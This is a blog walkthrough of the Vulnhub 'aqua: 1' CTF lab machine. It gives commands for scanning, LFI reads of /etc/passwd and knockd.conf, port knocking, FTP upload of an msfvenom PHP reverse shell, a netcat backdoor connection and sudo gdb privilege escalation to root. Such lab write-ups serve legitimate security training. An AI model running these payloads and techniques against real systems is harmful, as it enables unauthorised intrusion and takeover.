aqua: 1 walkthrough Vulnhub CTF

Aqua: 1 walkthrough Vulnhub CTF

Today we are Solving another Vulnhub CTF aqua: 1 is Created by yunaranyanca This CTF is hosted on Vulnhub Server You can download here

First Scanning our local network and finding our target IP

netdiscover
aqua: 1 walkthrough Vulnhub

Nmap aggressive port Scanning

nmap -A 192.168.1.14
aqua: 1 walkthrough Vulnhub
Enumeration

dirb scanning time we found may URL I used a filter .php and we see our output is filter .php extension

dirb http://192.168.1.14 -X .php /usr/share/wordlists/dirb/big.txt
aqua: 1 walkthrough Vulnhub

When I open target IP our browser and we found this page.

http://192.168.1.14

When clicking the “Sure, I’ll help” button, we are redirected to another page which shows credentials.

http://192.168.1.14/yes.html

dirb scanning time we found another URL login.php I open the URL and I see a login page, I try to log in this credential: vashivmegmin and we are successfully connected to it

http://192.168.1.14/login.php
aqua: 1 walkthrough Vulnhub

This URL is vulnerable to LFI(local file inclusion) we see the target system passwd file

http://192.168.1.14/home.php?showcase=../../../../etc/passwd

I log in ftp but I see Connection timed massage I go to more deeply enumeration and I found Knocked Firewall implement this server

http://192.168.1.14/home.php?showcase=../../../../etc/knockd.conf
aqua: 1 walkthrough Vulnhub
Port knocking
knock 192.168.1.14 1234 5678 9012

Log in with FTP Again

ftp 192.168.1.14
  • username: megumin
  • password: watashiwamegumin

dir command to we see all file our current directory file and permissions

dir
aqua: 1 writeup Vulnhub

Creating a msfvenom php reverse shell payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4545 -f raw >/tmp/shell.php

After creating a payload again login with ftp same username and password we already see directory permission ( 757 mean root user full permission and other users same permission the only group read and execute file )

cd production

this time uploading our shell web directory

put shell.php

We see our shell is uploaded successfully now executing our shell through LFI ( Local File Inclusion ) vulnerability

aqua: 1 walkthrough Vulnhub

I already start our msfconsole and we shell I got a reverse shell target machine

msfconsole

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
  • set lhost 192.168.1.8
  • set lport 4545
  • run
shell
aqua: 1 writeup Vulnhub

now I run shell command we see blank shell this time import bash shell through python module

python3 -c 'import pty;pty.spawn("/bin/bash")'

The current user is www-data and has very limited permissions.

id

And ID command to we see our current user shell is www-data we have already megumin user password I run the su (Switch User) command megumin and user password again we shell our shell is changed www-data to megumin

su megumin
aqua: 1 writeup Vulnhub

Let’s check with sudo -l sudoers file

sudo -l

We see a backdoor script sudoers file now I open the script cat command and we see an automatic natcat connection bash script I run the command with sudo and backdoor is opened

cat /home/aqua/Desktop/backdoor
sudo /home/aqua/Desktop/backdoor
aqua: 1 writeup Vulnhub

Connecting to backdoor

nc 192.168.1.14 1337

again import python modules spawn a shell

python -c 'import pty;pty.spawn("/bin/bash")'

I run the ID command and we see our last user is changed to aqua user I run again sudo -l command and I found may script but I try gdb privilege escalation

sudo -l

Privilege Escalation

GDB privilege escalation more about gdb see here

sudo gdb -nx -ex '!bash' -ex quit
cd /root

ls

Reading our Last root flag

cat root.txt
aqua: 1 writeup Vulnhub
Sar 1 read

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

Leave a Reply

Your email address will not be published. Required fields are marked *